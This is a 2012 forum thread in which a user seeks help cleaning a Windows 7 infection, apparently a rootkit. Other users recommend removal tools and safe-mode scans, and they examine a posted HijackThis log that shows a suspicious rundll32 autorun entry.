Title: [Solved] Windows infection: please help a security newbie
Post by: dree12 on July 22, 2012, 09:58:10 PM
My computer with Bitcoin on it has become infected. There isn't anything of value to worry about. The wallet is encrypted and backed-up. And, I doubt the malware currently infecting the system is interested in stealing it anyways. Right now, I'm more interested in salvaging the system (a clean install is likely to be both time-consuming and overwrite many files I didn't consider important enough to backup into my limited 4GB thumb drive). I suspect the culprit is a rootkit. Neither Kaspersky's TDSSKiller nor Systematec's ZeroAccess rootkit killer found anything though. Malwarebytes is taking a long time to scan, and is at 2 infected objects found. I suspect Microsoft Safety Scanner has found the same two items. How the malware bypassed UAC is unknown. The websites I visit should mostly come from the "safe sector of the net", and no websites in history are immediately suspicious. However, I do notice that "Adobe installation helper" has recently been run. This is the most likely culprit. The symptoms of the infection are diverse. I'll try to list some of the most obvious ones below: - The system is extremely slow and input is often interupted.
- Some services are missing (not stopped, but gone): Background Intelligent Transfer, Microsoft Antispyware, Windows Update, and Windows Firewall (probably more).
- As a consequence, MSE, Windows Firewall, and Windows Update are disabled and cannot be enabled.
- Google and Bing search results are sometimes randomly redirected to garbage websites.
My system is an genuine Windows 7 Professional install. Any help would be greatly appreciated.
Title: Re: Windows infection: please help a security newbie
Post by: Raoul Duke on July 22, 2012, 10:04:47 PM
Run this http://www.surfright.nl/en/hitmanpro/
No installation is needed so it may save your day
Title: Re: Windows infection: please help a security newbie
Post by: finkleshnorts on July 22, 2012, 10:30:16 PM
Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.
Title: Re: Windows infection: please help a security newbie
Post by: unclemantis on July 22, 2012, 10:38:27 PM
I really need to get around to just biting the bullet and run nothing but linux
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 22, 2012, 11:03:33 PM
Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.
One of the advantages Bitcoin offers is greater security :). Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.
Running GMER right now. Meanwhile, I'm copying the files I mentioned to a USB key. Hopefully this works.
Title: Re: Windows infection: please help a security newbie
Post by: amencon on July 22, 2012, 11:04:21 PM
To the best of my knowledge even "safe sector of the internet" sites sometimes let ads with malicious code slip through. I'd recommend in the future running a browser with the no-script plugin running. This way no script is run without your consent and knowledge.
As for your current infection Malwarebytes and combofix are a good start. The browser hijacking may be due to a modified HOSTS file (how to reset the file http://pctechnotes.com/how-to-reset-windows-hosts-file/).
If malwarebytes/Combofix/GMER doesn't set you straight update the thread and let us know what still isn't working right.
Always be wary of the system in the future if you decide not to "nuke it from orbit" though.
Title: Re: Windows infection: please help a security newbie
Post by: finkleshnorts on July 22, 2012, 11:11:02 PM
Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.
One of the advantages Bitcoin offers is greater security :). I consider myself lucky that they didn't get into my wallet or private keys (ditched those). The VISA refund was nice, too. Good luck!
Title: Re: Windows infection: please help a security newbie
Post by: myrkul on July 22, 2012, 11:13:06 PM
To the best of my knowledge even "safe sector of the internet" sites sometimes let ads with malicious code slip through. I'd recommend in the future running a browser with the no-script plugin running. This way no script is run without your consent and knowledge. This^ Ever since I switched to Firefox+Noscript, the only experiences I've had with malware of any sort is clearing it off my friends' computers.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 22, 2012, 11:42:26 PM
To the best of my knowledge even "safe sector of the internet" sites sometimes let ads with malicious code slip through. I'd recommend in the future running a browser with the no-script plugin running. This way no script is run without your consent and knowledge.
As for your current infection Malwarebytes and combofix are a good start. The browser hijacking may be due to a modified HOSTS file (how to reset the file http://pctechnotes.com/how-to-reset-windows-hosts-file/).
If malwarebytes/Combofix/GMER doesn't set you straight update the thread and let us know what still isn't working right.
Always be wary of the system in the future if you decide not to "nuke it from orbit" though.
Thanks. The hosts file is normal. The computer recently bluescreened, bringing Malwarebytes down with it (it's running again). Combofix isn't working (can't write "iexplore.exe"). I'm backing up the other important things now, in case worse goes to worse and a fresh install is necessary.
Title: Re: Windows infection: please help a security newbie
Post by: check_status on July 22, 2012, 11:43:31 PM
To get Malwarebytes to run properly, open the folder where Malwarebytes resides, rename the .exe to explorer.exe or firefox.exe. Now Right click, run as admin, your renamed .exe. Malwarebytes should run as normal. Some infections block specific processes by name.
Malwarebytes is a specialized scanner that doesn't look for common infections so you will need another scanner to look for other issues. WinMHR, after your Malwarebytes scan would be a good choice. They supply all of the AV companies with samples, so there database is much more complete, but it doesn't clean, only detects known non rootkit malware.
After running WinMHR, you may have an MD5 to compare on a site like VirusTotal in their Hash search. This will tell you which AV companies are detecting it and so which ones can clean it.
Cheers
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 22, 2012, 11:51:10 PM
If malwarebytes/Combofix/GMER doesn't set you straight update the thread and let us know what still isn't working right.
Always be wary of the system in the future if you decide not to "nuke it from orbit" though.
curious here too. malwarebytes is probably not worth messing with in this situation. Be sure to boot up in safe mode and then run Combofix and Gmer. I noticed you said you tried tdsskiller. Have you tried running rootkit revealer? Do them all in safe mode first. If you still are not getting anything, you can try running process explorer from MS. It often will allow you to detect 'unusual' entries that may not be obvious to the kit finders. If all else fails, post us a copy of your Hijack This log. cheers
Title: Re: Windows infection: please help a security newbie
Post by: check_status on July 23, 2012, 12:03:09 AM
Have you tried running rootkit revealer?
Really!! Mark still keeps this tool up to date, I thought he stopped developing it in 2008? Do them all in safe mode first. Some infections run even in safe mode, so this is not a solution.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 12:08:53 AM
To get Malwarebytes to run properly, open the folder where Malwarebytes resides, rename the .exe to explorer.exe or firefox.exe. Now Right click, run as admin, your renamed .exe. Malwarebytes should run as normal. Some infections block specific processes by name.
Malwarebytes is a specialized scanner that doesn't look for common infections so you will need another scanner to look for other issues. WinMHR, after your Malwarebytes scan would be a good choice. They supply all of the AV companies with samples, so there database is much more complete, but it doesn't clean, only detects known non rootkit malware.
After running WinMHR, you may have an MD5 to compare on a site like VirusTotal in their Hash search. This will tell you which AV companies are detecting it and so which ones can clean it.
Cheers
Noted. Malwarebytes is running fine. If malwarebytes/Combofix/GMER doesn't set you straight update the thread and let us know what still isn't working right.
Always be wary of the system in the future if you decide not to "nuke it from orbit" though.
curious here too. malwarebytes is probably not worth messing with in this situation. Be sure to boot up in safe mode and then run Combofix and Gmer. I noticed you said you tried tdsskiller. Have you tried running rootkit revealer? Do them all in safe mode first. If you still are not getting anything, you can try running process explorer from MS. It often will allow you to detect 'unusual' entries that may not be obvious to the kit finders. If all else fails, post us a copy of your Hijack This log. cheers Rootkit revealer doesn't work on Windows 7. Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 20:04:54, on 2012-07-22 Platform: Windows 7 SP1 (WinNT 6.00.3505) MSIE: Internet Explorer v9.00 (9.00.8112.16447) Boot mode: Normal
Running processes: C:\Windows\system32\taskhost.exe C:\Windows\system32\Dwm.exe C:\Windows\Explorer.EXE C:\Windows\System32\rundll32.exe C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe C:\Windows\System32\igfxtray.exe C:\Windows\System32\hkcmd.exe C:\Windows\System32\igfxpers.exe C:\Program Files\Microsoft IntelliPoint\ipoint.exe C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe C:\Program Files\Microsoft IntelliPoint\dpupdchk.exe C:\Windows\System32\rundll32.exe C:\Program Files\OpenOffice.org 3\program\soffice.exe C:\Program Files\TortoiseSVN\bin\TSVNCache.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\OpenOffice.org 3\program\soffice.bin C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\system32\Macromed\Flash\FlashUtil32_11_3_300_265_ActiveX.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Users\~\AppData\Local\Temp\Temp1_ProcessExplorer.zip\procexp.exe C:\Users\~\Downloads\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://ca.msn.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer, optimized for Bing and MSN R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = R3 - URLSearchHook: (no name) - - (no file) O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll O2 - BHO: Windows Live Messenger Companion Helper - {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files\Windows Live\Companion\companioncore.dll O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe" O4 - HKLM\..\Run: [Microsoft Default Manager] "C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe O4 - HKLM\..\Run: [IntelliPoint] "c:\Program Files\Microsoft IntelliPoint\ipoint.exe" O4 - HKLM\..\Run: [TortoiseHgOverlayIconServer] C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep O4 - Startup: OpenOffice.org 3.4.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MIF5BA~1\Office14\EXCEL.EXE/3000 O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MIF5BA~1\Office14\ONBttnIE.dll/105 O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics O15 - Trusted Zone: http://www.w3.org O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab O16 - DPF: {339C1EE2-1029-46B8-81F1-360217F26FC4} (PowerCreator VGAPlayer Control) - http://mms.hwjyw.com/courseware///courseware/2008-2-28/pengjunjiangzuo31204167051316/VGAPlayer.cab O16 - DPF: {444785F1-DE89-4295-863A-D46C3A781394} - http://webplayer.unity3d.com/download_webplayer-2.x/UnityWebPlayer.cab O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab O16 - DPF: {A8F2B9BD-A6A0-486A-9744-18920D898429} - http://www.sibelius.com/download/software/win/ActiveXPlugin.cab O16 - DPF: {D1278801-B2C0-4332-BD3E-2F64D2204EDF} (Windows Live Mesh Upload Tool) - https://www.mesh.com/0.9.4014.21/TSWeb.cab O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe O23 - Service: DirMngr - Unknown owner - C:\Program Files\GNU\GnuPG\dirmngr.exe O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
-- End of file - 6224 bytes
(edited to remove my name, which means the byte count is incorrect). I'm wondering, is it usually good practice to move the coins to a new wallet in this situation? The wallet is encrypted with a decent passphrase.
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 12:21:21 AM
Do them all in safe mode first. Some infections run even in safe mode, so this is not a solution. It is not a solution. it's the right way to do it.. Sorry, I also did not realize this thread was supposed to be a tech support 'wang off'. ;p
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 12:28:43 AM
Rootkit revealer doesn't work on Windows 7. Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 20:04:54, on 2012-07-22 Platform: Windows 7 SP1 (WinNT 6.00.3505) MSIE: Internet Explorer v9.00 (9.00.8112.16447) Boot mode: Normal
Running processes: C:\Windows\system32\taskhost.exe C:\Windows\system32\Dwm.exe C:\Windows\Explorer.EXE C:\Windows\System32\rundll32.exe C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe C:\Windows\System32\igfxtray.exe C:\Windows\System32\hkcmd.exe C:\Windows\System32\igfxpers.exe C:\Program Files\Microsoft IntelliPoint\ipoint.exe C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe C:\Program Files\Microsoft IntelliPoint\dpupdchk.exe C:\Windows\System32\rundll32.exe C:\Program Files\OpenOffice.org 3\program\soffice.exe C:\Program Files\TortoiseSVN\bin\TSVNCache.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\OpenOffice.org 3\program\soffice.bin C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\system32\Macromed\Flash\FlashUtil32_11_3_300_265_ActiveX.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Users\~\AppData\Local\Temp\Temp1_ProcessExplorer.zip\procexp.exe C:\Users\~\Downloads\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://ca.msn.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer, optimized for Bing and MSN R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = R3 - URLSearchHook: (no name) - - (no file) O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll O2 - BHO: Windows Live Messenger Companion Helper - {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files\Windows Live\Companion\companioncore.dll O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe" O4 - HKLM\..\Run: [Microsoft Default Manager] "C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe O4 - HKLM\..\Run: [IntelliPoint] "c:\Program Files\Microsoft IntelliPoint\ipoint.exe" O4 - HKLM\..\Run: [TortoiseHgOverlayIconServer] C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep O4 - Startup: OpenOffice.org 3.4.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MIF5BA~1\Office14\EXCEL.EXE/3000 O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MIF5BA~1\Office14\ONBttnIE.dll/105 O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics O15 - Trusted Zone: http://www.w3.org O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab O16 - DPF: {339C1EE2-1029-46B8-81F1-360217F26FC4} (PowerCreator VGAPlayer Control) - http://mms.hwjyw.com/courseware///courseware/2008-2-28/pengjunjiangzuo31204167051316/VGAPlayer.cab O16 - DPF: {444785F1-DE89-4295-863A-D46C3A781394} - http://webplayer.unity3d.com/download_webplayer-2.x/UnityWebPlayer.cab O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab O16 - DPF: {A8F2B9BD-A6A0-486A-9744-18920D898429} - http://www.sibelius.com/download/software/win/ActiveXPlugin.cab O16 - DPF: {D1278801-B2C0-4332-BD3E-2F64D2204EDF} (Windows Live Mesh Upload Tool) - https://www.mesh.com/0.9.4014.21/TSWeb.cab O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe O23 - Service: DirMngr - Unknown owner - C:\Program Files\GNU\GnuPG\dirmngr.exe O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
-- End of file - 6224 bytes
(edited to remove my name, which means the byte count is incorrect). I'm wondering, is it usually good practice to move the coins to a new wallet in this situation? The wallet is encrypted with a decent passphrase. What is this; O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep Nothing else stands out to me atleast.
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 12:30:57 AM
If you do feel the need to move your coins, be sure to do it from a clean computer.
Did you mention the spec on your machine?
What processor, ram, vid card?
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 12:34:45 AM
Rootkit revealer doesn't work on Windows 7. Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 20:04:54, on 2012-07-22 Platform: Windows 7 SP1 (WinNT 6.00.3505) MSIE: Internet Explorer v9.00 (9.00.8112.16447) Boot mode: Normal
Running processes: C:\Windows\system32\taskhost.exe C:\Windows\system32\Dwm.exe C:\Windows\Explorer.EXE C:\Windows\System32\rundll32.exe C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe C:\Windows\System32\igfxtray.exe C:\Windows\System32\hkcmd.exe C:\Windows\System32\igfxpers.exe C:\Program Files\Microsoft IntelliPoint\ipoint.exe C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe C:\Program Files\Microsoft IntelliPoint\dpupdchk.exe C:\Windows\System32\rundll32.exe C:\Program Files\OpenOffice.org 3\program\soffice.exe C:\Program Files\TortoiseSVN\bin\TSVNCache.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\OpenOffice.org 3\program\soffice.bin C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\system32\Macromed\Flash\FlashUtil32_11_3_300_265_ActiveX.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Users\~\AppData\Local\Temp\Temp1_ProcessExplorer.zip\procexp.exe C:\Users\~\Downloads\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://ca.msn.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer, optimized for Bing and MSN R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = R3 - URLSearchHook: (no name) - - (no file) O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll O2 - BHO: Windows Live Messenger Companion Helper - {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files\Windows Live\Companion\companioncore.dll O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe" O4 - HKLM\..\Run: [Microsoft Default Manager] "C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe O4 - HKLM\..\Run: [IntelliPoint] "c:\Program Files\Microsoft IntelliPoint\ipoint.exe" O4 - HKLM\..\Run: [TortoiseHgOverlayIconServer] C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep O4 - Startup: OpenOffice.org 3.4.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MIF5BA~1\Office14\EXCEL.EXE/3000 O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MIF5BA~1\Office14\ONBttnIE.dll/105 O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics O15 - Trusted Zone: http://www.w3.org O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab O16 - DPF: {339C1EE2-1029-46B8-81F1-360217F26FC4} (PowerCreator VGAPlayer Control) - http://mms.hwjyw.com/courseware///courseware/2008-2-28/pengjunjiangzuo31204167051316/VGAPlayer.cab O16 - DPF: {444785F1-DE89-4295-863A-D46C3A781394} - http://webplayer.unity3d.com/download_webplayer-2.x/UnityWebPlayer.cab O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab O16 - DPF: {A8F2B9BD-A6A0-486A-9744-18920D898429} - http://www.sibelius.com/download/software/win/ActiveXPlugin.cab O16 - DPF: {D1278801-B2C0-4332-BD3E-2F64D2204EDF} (Windows Live Mesh Upload Tool) - https://www.mesh.com/0.9.4014.21/TSWeb.cab O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe O23 - Service: DirMngr - Unknown owner - C:\Program Files\GNU\GnuPG\dirmngr.exe O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
-- End of file - 6224 bytes
(edited to remove my name, which means the byte count is incorrect). I'm wondering, is it usually good practice to move the coins to a new wallet in this situation? The wallet is encrypted with a decent passphrase. What is this; O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep Nothing else stands out to me atleast. Do I "fix" it? If you do feel the need to move your coins, be sure to do it from a clean computer.
Did you mention the spec on your machine?
What processor, ram, vid card?
